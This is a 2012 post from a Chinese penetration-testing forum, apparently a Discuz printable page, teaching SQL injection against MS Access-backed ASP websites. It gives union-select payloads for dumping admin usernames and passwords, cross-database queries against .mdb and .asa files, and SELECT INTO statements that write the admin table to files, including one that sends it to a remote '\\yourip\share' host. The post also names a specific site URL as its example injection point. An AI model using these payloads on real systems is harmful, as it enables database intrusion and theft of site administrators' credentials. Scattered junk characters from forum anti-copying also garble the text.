中国网络渗透测试联盟

标题: Access高级注入语句 [打印本页]

作者: admin    时间: 2012-9-15 14:20
标题: Access高级注入语句
--------------------------------------------------------------9 _3 `! w2 K6 k% U! x
union查询法! y- ]8 e% p, d- v/ j$ g
首先要说的就是查询办法,一般的查询办法就是
2 v2 y' A4 ^1 o' t6 Q  }: j0 W9 m
! l/ @) [0 ^. d8 c3 |* D  _4 T程序代码
. Z$ f% I, B& W6 H) z( j/ Kand 1=(select count(*) from admin where left(id,1)='1')2 p  ?8 l! l  M! P

% C) r3 [. Z' A# }# Y这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯./ Q& \1 C# l: @( M" W& A
所以这个时候,union select横空出现.别以为只能在PHP里用哦...; V# U( k  A. P" A# Z- z. o/ ?
譬如你有一个ACCESS点:
' |6 O3 k' _, j程序代码% v2 x5 w7 |; v$ L; F' O' p
http://bbs.tian6.com/xiaoyang.asp?coder=1$ s5 H, a, s. n9 \0 Y3 ?

, ]' {2 @8 {9 ^" Q/ @知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
; B& v1 _8 L* }! N; W  j) ?然后我们直接来:
) j0 o/ G. r) w2 x程序代码; F. y$ X2 z  L; p7 n
http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]6 X, |+ _8 e% [% r9 r

4 ^2 F) A- e& }: V这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.( L% ~/ f+ S6 o- a( ^0 u6 K- A: ?

# a6 C# x9 N: ?3 Z4 F. u  m1 m& E4 x. u! @8 g4 o- l- Y, m/ m

$ {5 n6 }0 T4 k; J* N1 V6 v---------------------------------------------------------------# r6 Q% O( ]0 H/ l5 l" L2 L/ U" ?
Access跨库查询( x  j, M! x  v* ?4 ~
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
2 ~0 W3 D6 s$ q3 ?7 T. Z跨库的查询语句:
/ s; k3 w( [4 a+ j+ _& ~子查询:8 i. N- r+ P' T5 S5 I
程序代码
) F4 H% |8 ^  M& oand (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
3 Q' ?& [7 a6 k/ V
1 s* }" Z$ F7 }union查询:5 O& P5 U/ N. R  n2 z4 ^" Q! W
程序代码
! s% k7 R- Y+ ^' P: ?union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
' Z( \2 S' \/ r# n6 B/ T- c! k9 ]; c
* F, V" G3 b1 u跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
% l( y% q6 J# B9 F' v  s: ^程序代码4 j6 G" [, J; ^0 w
http://www.4ngel.net/article/46.htm
" u; m8 D6 h) \; p2 O  z3 \' d! {http://hf110.com/Article/hack/rqsl/200502/66.html
$ R) D7 H2 S# s1 e
6 V' ?' l# _0 d& Z---------------------------------------------------------------6 @% R4 \9 U9 J9 b2 O3 l5 U3 x7 C
Access注入,导出txt,htm,html
. |8 c! f) y0 Y6 U子查询语句:
* Z: V8 g! E+ T. ^4 W2 T程序代码" b/ s! b7 p8 n2 p5 n( k
Select * into [test.txt] in 'd:\web\' 'text;' from admin
( x7 C3 }& ^) l9 A: v8 K6 S5 `, x) {$ i% ^
这样就把admin表的内容以test类型存进了d:\web里面.
  c. a& v; a- B3 U8 Z% ?UNION查询:( a, k; P6 m: S4 k3 K' G
程序代码
7 T7 Z$ V/ O) W! f& Z4 Dunion select * into [admin.txt] in 'c:\' 'test;' from admin
. i* I9 _3 a1 K8 C! m  U$ B0 R5 g9 k/ A$ d+ _1 K6 W
而且这里也可以保存到本地来:4 _( t4 ?3 d; W
程序代码/ q4 J) b- B6 s; ]. D
Select * into [test.txt] in '\\yourip\share' 'text;' from admin8 _& G5 S; t2 x  Z6 i$ G

- A+ K: a0 G$ e. y; z  }. R# S9 Z8 H不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
* l5 B' C, F9 _0 H) X
- b0 L# F+ B$ j+ L( y程序代码( d7 T* K  K5 O/ {
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7& q  J4 g& @5 }5 t5 a3 m+ b

4 g/ z- ~* C2 q2 ?7 r  M+ ?1 U4 `因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.9 N9 d( k3 l% t- _2 b7 p





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2